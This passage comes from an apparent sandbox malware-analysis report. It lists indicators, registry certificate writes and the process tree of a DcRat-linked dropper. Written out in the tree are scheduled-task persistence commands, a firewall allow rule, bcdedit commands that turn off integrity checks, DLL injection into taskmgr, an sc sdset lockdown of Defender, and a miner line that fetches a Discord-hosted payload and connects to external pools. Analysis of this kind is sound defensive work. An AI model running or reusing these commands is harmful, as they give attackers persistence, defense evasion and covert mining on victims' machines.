040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rty25.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	build2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	build2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	rty25.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	rty25.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	build2.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspub1.exed21cbe21e38b385a41a68c5e6dd32f4c.exeu21k.0.exed21cbe21e38b385a41a68c5e6dd32f4c.exe

pid	process
2716	toolspub1.exe
2716	toolspub1.exe
2820	d21cbe21e38b385a41a68c5e6dd32f4c.exe
548	u21k.0.exe
1200
1200
1200
1200
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200
1200

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

472
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

C40A.execjcwfvs

pid process

2716
2564 C40A.exe
1060 cjcwfvs

pid	process
472

pid	process
2716
2564	C40A.exe
1060	cjcwfvs

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.execsrss.exesc.exewup.exe

description	pid	process
Token: SeDebugPrivilege	2820	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeImpersonatePrivilege	2820	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeShutdownPrivilege	1200
Token: SeSystemEnvironmentPrivilege	2088	csrss.exe
Token: SeSecurityPrivilege	1684	sc.exe
Token: SeSecurityPrivilege	1684	sc.exe
Token: SeShutdownPrivilege	1200
Token: SeShutdownPrivilege	1200
Token: SeLockMemoryPrivilege	2904	wup.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wup.exe

pid process

2904 wup.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

u21k.1.exe

pid process

3068 u21k.1.exe

pid	process
2904	wup.exe

pid	process
3068	u21k.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exeInstallSetup_nine.exed21cbe21e38b385a41a68c5e6dd32f4c.execmd.exeu21k.1.execsrss.execmd.exeDD84.exe

description	pid	process	target process
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2648	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	InstallSetup_nine.exe
PID 2008 wrote to memory of 2820	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2008 wrote to memory of 2820	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2008 wrote to memory of 2820	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2008 wrote to memory of 2820	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2008 wrote to memory of 2244	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	rty25.exe
PID 2008 wrote to memory of 2244	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	rty25.exe
PID 2008 wrote to memory of 2244	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	rty25.exe
PID 2008 wrote to memory of 2244	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	rty25.exe
PID 2008 wrote to memory of 2716	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	toolspub1.exe
PID 2008 wrote to memory of 2716	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	toolspub1.exe
PID 2008 wrote to memory of 2716	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	toolspub1.exe
PID 2008 wrote to memory of 2716	2008	1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe	toolspub1.exe
PID 2648 wrote to memory of 548	2648	InstallSetup_nine.exe	u21k.0.exe
PID 2648 wrote to memory of 548	2648	InstallSetup_nine.exe	u21k.0.exe
PID 2648 wrote to memory of 548	2648	InstallSetup_nine.exe	u21k.0.exe
PID 2648 wrote to memory of 548	2648	InstallSetup_nine.exe	u21k.0.exe
PID 2648 wrote to memory of 3068	2648	InstallSetup_nine.exe	u21k.1.exe
PID 2648 wrote to memory of 3068	2648	InstallSetup_nine.exe	u21k.1.exe
PID 2648 wrote to memory of 3068	2648	InstallSetup_nine.exe	u21k.1.exe
PID 2648 wrote to memory of 3068	2648	InstallSetup_nine.exe	u21k.1.exe
PID 2340 wrote to memory of 932	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	cmd.exe
PID 2340 wrote to memory of 932	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	cmd.exe
PID 2340 wrote to memory of 932	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	cmd.exe
PID 2340 wrote to memory of 932	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	cmd.exe
PID 932 wrote to memory of 2064	932	cmd.exe	netsh.exe
PID 932 wrote to memory of 2064	932	cmd.exe	netsh.exe
PID 932 wrote to memory of 2064	932	cmd.exe	netsh.exe
PID 2340 wrote to memory of 2088	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	csrss.exe
PID 2340 wrote to memory of 2088	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	csrss.exe
PID 2340 wrote to memory of 2088	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	csrss.exe
PID 2340 wrote to memory of 2088	2340	d21cbe21e38b385a41a68c5e6dd32f4c.exe	csrss.exe
PID 3068 wrote to memory of 1520	3068	u21k.1.exe	cmd.exe
PID 3068 wrote to memory of 1520	3068	u21k.1.exe	cmd.exe
PID 3068 wrote to memory of 1520	3068	u21k.1.exe	cmd.exe
PID 3068 wrote to memory of 1520	3068	u21k.1.exe	cmd.exe
PID 2088 wrote to memory of 1992	2088	csrss.exe	injector.exe
PID 2088 wrote to memory of 1992	2088	csrss.exe	injector.exe
PID 2088 wrote to memory of 1992	2088	csrss.exe	injector.exe
PID 2088 wrote to memory of 1992	2088	csrss.exe	injector.exe
PID 1520 wrote to memory of 812	1520	cmd.exe	chcp.com
PID 1520 wrote to memory of 812	1520	cmd.exe	chcp.com
PID 1520 wrote to memory of 812	1520	cmd.exe	chcp.com
PID 1520 wrote to memory of 812	1520	cmd.exe	chcp.com
PID 1520 wrote to memory of 1760	1520	cmd.exe	schtasks.exe
PID 1520 wrote to memory of 1760	1520	cmd.exe	schtasks.exe
PID 1520 wrote to memory of 1760	1520	cmd.exe	schtasks.exe
PID 1520 wrote to memory of 1760	1520	cmd.exe	schtasks.exe
PID 1200 wrote to memory of 2564	1200		C40A.exe
PID 1200 wrote to memory of 2564	1200		C40A.exe
PID 1200 wrote to memory of 2564	1200		C40A.exe
PID 1200 wrote to memory of 2564	1200		C40A.exe
PID 1200 wrote to memory of 880	1200		DD84.exe
PID 1200 wrote to memory of 880	1200		DD84.exe
PID 1200 wrote to memory of 880	1200		DD84.exe
PID 1200 wrote to memory of 880	1200		DD84.exe
PID 880 wrote to memory of 912	880	DD84.exe	DD84.exe
PID 880 wrote to memory of 912	880	DD84.exe	DD84.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
"C:\Users\Admin\AppData\Local\Temp\1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Users\Admin\AppData\Local\Temp\InstallSetup_nine.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup_nine.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Users\Admin\AppData\Local\Temp\u21k.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u21k.0.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:548
- - C:\Users\Admin\AppData\Local\Temp\u21k.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u21k.1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1520
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:812
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1760
- C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
  "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    - DcRat
    - Windows security bypass
    - Executes dropped EXE
    - Loads dropped DLL
    - Windows security modification
    - Adds Run key to start application
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:2064
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Manipulates WinMon driver.
      Manipulates WinMonFS driver.
      Drops file in Windows directory
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2088
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1032
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:2568
    - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:308
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2504
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2112
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2440
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1208
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2376
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2308
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1316
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2924
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1784
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2648
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2364
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1504
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:292
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        Executes dropped EXE
        
        PID:1992
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2556
    - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        5⤵
        Executes dropped EXE
        
        PID:2444
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1340
    - - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        5⤵
        Executes dropped EXE
        
        PID:576
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
    - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2432
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 2904
        6⤵
        Executes dropped EXE
        Manipulates WinMon driver.
        
        PID:1944
